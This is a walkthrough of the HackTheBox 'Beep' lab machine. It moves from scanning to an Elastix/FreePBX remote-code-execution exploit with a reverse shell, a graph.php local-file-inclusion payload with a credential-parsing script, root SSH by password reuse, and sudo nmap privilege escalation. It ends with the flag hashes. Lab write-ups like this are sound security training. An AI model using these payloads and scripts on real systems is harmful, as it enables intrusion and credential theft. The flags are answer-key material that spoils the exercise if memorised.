HackTheBox Beep

Writeup for HackTheBox Beep

Machine Synopsis

Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method. This machine can be overwhelming for some as there are many potential attack vectors. Luckily, there are several methods available for gaining access. (Source)

Enumeration

A full TCP port scan with version detection and default scripts (-A already implies -sC and -sV):

```
$ nmap -sC -sV -A -p- 10.10.10.7

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-title: Did not follow redirect to https://10.10.10.7/
|_http-server-header: Apache/2.2.3 (CentOS)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_pop3-capabilities: USER PIPELINING RESP-CODES AUTH-RESP-CODE APOP EXPIRE(NEVER) UIDL IMPLEMENTATION(Cyrus POP3 server v2) STLS TOP LOGIN-DELAY(0)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: NAMESPACE Completed CONDSTORE UNSELECT MULTIAPPEND RIGHTS=kxte LITERAL+ CHILDREN ACL OK SORT LIST-SUBSCRIBED X-NETSCAPE NO RENAME CATENATE URLAUTHA0001 IDLE SORT=MODSEQ MAILBOX-REFERRALS ANNOTATEMORE LISTEXT THREAD=ORDEREDSUBJECT BINARY UIDPLUS ID QUOTA IMAP4rev1 THREAD=REFERENCES STARTTLS ATOMIC IMAP4
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
| http-robots.txt: 1 disallowed entry 
|_/
|_ssl-date: 2022-06-27T07:41:11+00:00; 0s from scanner time.
|_http-server-header: Apache/2.2.3 (CentOS)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_http-title: Elastix - Login page
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
3306/tcp  open  mysql      MySQL (unauthorized)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
```

Port 80 redirects to HTTPS, where the default page is the Elastix login form (the http-title on port 443 already said as much).

[screenshot: website]

Default credentials do not work on this login page, so let's run a gobuster scan against the HTTPS site.

```
$ gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirb/common.txt -t 50 -k
...
/.htpasswd            (Status: 403) [Size: 287]
/.hta                 (Status: 403) [Size: 282]
/.htaccess            (Status: 403) [Size: 287]
/admin                (Status: 301) [Size: 309] [--> https://10.10.10.7/admin/]
/cgi-bin/             (Status: 403) [Size: 286]                                
/configs              (Status: 301) [Size: 311] [--> https://10.10.10.7/configs/]
...
```

The -k flag makes gobuster skip TLS certificate verification, which is needed here because the server presents a self-signed certificate for localhost.localdomain that expired in 2018.

/admin is the interesting hit, but the default credentials do not work there either.

[screenshot: admin_login]

The page prompts for HTTP basic authentication. Clicking Cancel lands on an error page that discloses the FreePBX version (FreePBX is the PBX web front end bundled with Elastix).

[screenshot: unauthorized]

With a version number in hand, we can search the local Exploit-DB copy with searchsploit.

```
$ searchsploit elastix 
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
Elastix - 'page' Cross-Site Scripting                                               | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                             | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                       | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                    | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                   | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                  | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                              | php/webapps/18650.py
------------------------------------------------------------------------------------ ---------------------------------
```

Exploitation

Exploit - RCE

```
$ searchsploit -m 18650
$ cat 18650.py   
...
```

Reading the script, three values need to be changed: rhost, lhost and extension. The extension is a valid SIP extension on the PBX, which the script needs in order to get its request accepted by FreePBX. I had no idea which extensions existed, so I searched for "find voip extensions kali", which led to Kali's sipvicious package and its svwar tool, a SIP extension enumerator.

```
$ svwar -h          
Usage: svwar [options] target
examples:
svwar -e100-999 udp://10.0.0.1:5080
svwar -d dictionary.txt 10.0.0.2
...
  -m OPTIONS, --method=OPTIONS
                        specify a request method. The default is REGISTER.
                        Other possible methods are OPTIONS and INVITE
...

$ svwar -m INVITE -e100-999 10.10.10.7 
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night
WARNING:TakeASip:extension '690' probably exists but the response is unexpected
+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233       | reqauth        |
+-----------+----------------+
| 690       | weird          |
+-----------+----------------+
```

Extension 233 exists and requires authentication, so use it. Now let's set the three values in the script:

```python
rhost="10.10.10.7"
lhost="10.10.16.10"
extension="233"
```

Running the script fails with an [SSL: UNSUPPORTED_PROTOCOL] error. That error comes from our own OpenSSL client refusing whatever protocol versions the server offers, so let's run sslscan against the site to see which SSL/TLS versions it actually supports.

```
$ sslscan 10.10.10.7
Version: 2.0.12-static
OpenSSL 1.1.1n-dev  xx XXX xxxx

Connected to 10.10.10.7

Testing SSL server 10.10.10.7 on port 443 using SNI name 10.10.10.7

  SSL/TLS Protocols:
SSLv2     disabled
SSLv3     enabled
TLSv1.0   enabled
TLSv1.1   disabled
TLSv1.2   disabled
TLSv1.3   disabled
...
```

The server only speaks SSLv3 and TLSv1.0. A modern Kali/Debian OpenSSL refuses both by default: the system policy in /etc/ssl/openssl.cnf pins a minimum of TLSv1.2 at security level 2, and that is exactly what produced the UNSUPPORTED_PROTOCOL error. This was the original openssl.cnf:

```
$ cat /etc/ssl/openssl.cnf
...
[system_default_sect]
MinProtocol = TLSv1.2
CipherString = DEFAULT@SECLEVEL=2
```

Relaxing the system default removes the floor and lets the client negotiate TLSv1.0 with the target:

```
$ cat /etc/ssl/openssl.cnf
...
[system_default_sect]
MinProtocol = None
CipherString = DEFAULT
```
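
Editing /etc/ssl/openssl.cnf weakens every TLS client on the attacking machine until you remember to revert it. The following is an added example (not part of the original writeup, nor of the 18650.py exploit) showing how to scope the same relaxation to a single Python process by building an SSLContext that will go down to TLSv1.0 with verification disabled; TARGET_URL, the fetch helper and the describe helper are assumptions for illustration.

```python
import ssl
import urllib.request

# Assumed target: the Elastix host from this writeup. It offers only SSLv3 and
# TLSv1.0, so a default client context (TLSv1.2 minimum) fails with
# UNSUPPORTED_PROTOCOL before any HTTP is exchanged.
TARGET_URL = "https://10.10.10.7/"


def legacy_tls_context():
    """Client context that negotiates TLSv1.0 with an old server.

    Scoped to this process only, unlike editing /etc/ssl/openssl.cnf.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    # The target's certificate is self-signed, issued to localhost.localdomain
    # and expired, so hostname checks and chain verification must both go.
    # check_hostname has to be cleared before verify_mode can be CERT_NONE.
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    # Lower the protocol floor to TLSv1.0 (SSLv3 cannot be re-enabled; modern
    # OpenSSL builds compile it out entirely).
    ctx.minimum_version = ssl.TLSVersion.TLSv1
    # OpenSSL 3.x additionally refuses TLS < 1.2 unless the security level is
    # 0. The @SECLEVEL syntax is OpenSSL-specific and LibreSSL rejects it,
    # hence the fallback to a plain cipher string.
    try:
        ctx.set_ciphers("DEFAULT@SECLEVEL=0")
    except ssl.SSLError:
        ctx.set_ciphers("DEFAULT")
    return ctx


def fetch(url, timeout=10):
    """GET a URL over the legacy context; returns (HTTP status, body bytes)."""
    with urllib.request.urlopen(url, context=legacy_tls_context(),
                                timeout=timeout) as resp:
        return resp.status, resp.read()


def describe(ctx):
    """Summarise what a context will accept, for a quick sanity check."""
    return {
        "minimum_version": ctx.minimum_version.name,
        "verify": ctx.verify_mode.name,
        "check_hostname": ctx.check_hostname,
    }


if __name__ == "__main__":
    print(describe(legacy_tls_context()))
    status, body = fetch(TARGET_URL)
    print(status, body[:80])
```

If you would rather keep running the unmodified 18650.py, the same per-process effect can be had without touching the system file: copy openssl.cnf somewhere writable, relax its [system_default_sect] there, and point the OPENSSL_CONF environment variable at the copy when launching the exploit.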

Start a netcat listener on port 443 first (the port the script's reverse shell connects back to), then run the exploit. The shell comes back as the asterisk service account. Remember to restore the original openssl.cnf afterwards, since the relaxed setting affects every TLS client on the attacking machine.

```
$ python 18650.py   
```

```
$ nc -nlvp 443                        
listening on [any] 443 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.10.7] 60562
whoami
asterisk
```

Alternative Exploit - Local File Inclusion

```
$ searchsploit -m 37637
$ cat 37637.pl
...
#LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
...
```

Append that path to https://10.10.10.7 in the browser. graph.php builds an include() path from the current_language parameter, so the ../ sequence climbs to the filesystem root and reaches /etc/amportal.conf. The trailing %00 is a URL-encoded null byte: PHP stops reading the path there, which drops the suffix the script appends to the language name. That trick only works on PHP older than 5.3.4, which started rejecting paths containing null bytes. The included file is dumped into the HTML, so view the page source.

[screenshot: website_lfi]

The page source contains the FreePBX database and Asterisk manager credentials:

```
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
```
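
Two steps above are easy to get wrong by hand: building the LFI request and separating live credentials from the commented-out defaults (the old AMPDBPASS=amp109 would send you down a dead end). This added example, which is not part of the original writeup or of 37637.pl, reproduces the exploit string from the script for an arbitrary file and parses the AMP* settings out of the returned page. BASE_URL and the helper names are assumptions, and SAMPLE_RESPONSE is a constructed response that wraps the amportal.conf excerpt above in HTML the way the vulnerable page embeds it.

```python
import re
from urllib.parse import quote

# Assumed base URL: the Elastix host from this writeup.
BASE_URL = "https://10.10.10.7"

# Traversal prefix copied from the exploit string in 37637.pl.
TRAVERSAL = "../../../../../../../..//"

# Matches an uncommented key=value line such as AMPDBPASS=jEhdIekWmdjE.
AMP_LINE = re.compile(r"^\s*(AMP[A-Z0-9_]+)\s*=\s*(\S*)")


def build_lfi_url(target_file, base=BASE_URL):
    """Build the graph.php request that includes target_file.

    The trailing null byte truncates the suffix graph.php appends to the
    language name; this only works on PHP versions before 5.3.4, which
    began rejecting paths containing null bytes.
    """
    path = TRAVERSAL + target_file.lstrip("/") + "\x00"
    return (f"{base}/vtigercrm/graph.php?current_language={quote(path, safe='/')}"
            "&module=Accounts&action")


def parse_amportal(text):
    """Return the active (uncommented) AMP* settings found in an LFI response.

    HTML tags are replaced by newlines first, since the file contents are
    embedded in the page. Lines starting with '#' are the stock defaults
    FreePBX leaves behind and are skipped on purpose.
    """
    settings = {}
    for raw in re.sub(r"<[^>]+>", "\n", text).splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = AMP_LINE.match(line)
        if m:
            settings[m.group(1)] = m.group(2)
    return settings


def credential_pairs(settings):
    """Pair user/password settings into (service, user, password) tuples."""
    pairs = []
    if "AMPDBUSER" in settings and "AMPDBPASS" in settings:
        pairs.append(("mysql", settings["AMPDBUSER"], settings["AMPDBPASS"]))
    if "AMPMGRUSER" in settings and "AMPMGRPASS" in settings:
        pairs.append(("asterisk-manager", settings["AMPMGRUSER"],
                      settings["AMPMGRPASS"]))
    return pairs


# Constructed sample: the amportal.conf excerpt from this writeup, wrapped in
# the kind of HTML the vulnerable page returns around the included file.
SAMPLE_RESPONSE = """<html><body><pre>
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
</pre></body></html>"""


if __name__ == "__main__":
    print(build_lfi_url("/etc/amportal.conf"))
    for service, user, password in credential_pairs(parse_amportal(SAMPLE_RESPONSE)):
        print(f"{service}: {user} / {password}")
```

The parser deliberately returns only the values the PBX is actually using; the commented AMPDBNAME and the two amp1xx defaults never make it into the result, so whatever you feed to ssh, mysql or the manager interface on port 5038 is the live credential.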

The same password is used for both the database user and the Asterisk manager user, so it is worth trying for password reuse elsewhere, starting with root over SSH. Connecting needs two extra options: this OpenSSH 4.3 server only offers SHA-1 key exchanges and ssh-rsa/ssh-dss host keys, which current OpenSSH clients disable by default, so they have to be re-enabled explicitly for this host.

```
$ ssh root@10.10.10.7 
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1

$ ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1
Unable to negotiate with 10.10.10.7 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

$ ssh root@10.10.10.7 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss
The authenticity of host '10.10.10.7 (10.10.10.7)' can't be established.
DSA key fingerprint is SHA256:AGaW4a0uNJ7KPMpSOBD+aVIN75AV3C0y8yKpqFjedTc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.7' (DSA) to the list of known hosts.
root@10.10.10.7's password: jEhdIekWmdjE
Last login: Tue Jul 16 11:45:47 2019

Welcome to Elastix 
----------------------------------------------------

To access your Elastix System, using a separate workstation (PC/MAC/Linux)
Open the Internet Browser using the following URL:
http://10.10.10.7

[root@beep ~]# whoami
root
```

Privilege Escalation

The SSH route already lands as root, so this section applies to the asterisk shell obtained through the RCE exploit. Let's run sudo -l to see what the service account may run as root:

```
$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
```

Checking that list against GTFOBins, nmap is the obvious candidate: the Nmap 4.11 installed here still has an --interactive mode, and commands prefixed with ! in that prompt are passed to a shell. Interactive mode was removed after Nmap 5.21, so on a newer build the equivalent is sudo nmap --script with a small NSE file that calls os.execute. Several of the other entries (chmod, chown, yum, service) also have GTFOBins sudo entries, but nmap is a single command.

[screenshot: sudo_nmap]

```
$ sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
whoami
root
cd /home
ls
fanis
spamfilter
cat /home/fanis/user.txt
3ef574d538895f20a84739bddd0a7c9f
cat /root/root.txt
d7aa9cd47efa9b103e8f0274b11c00e3
```

This post is licensed under CC BY 4.0 by the author.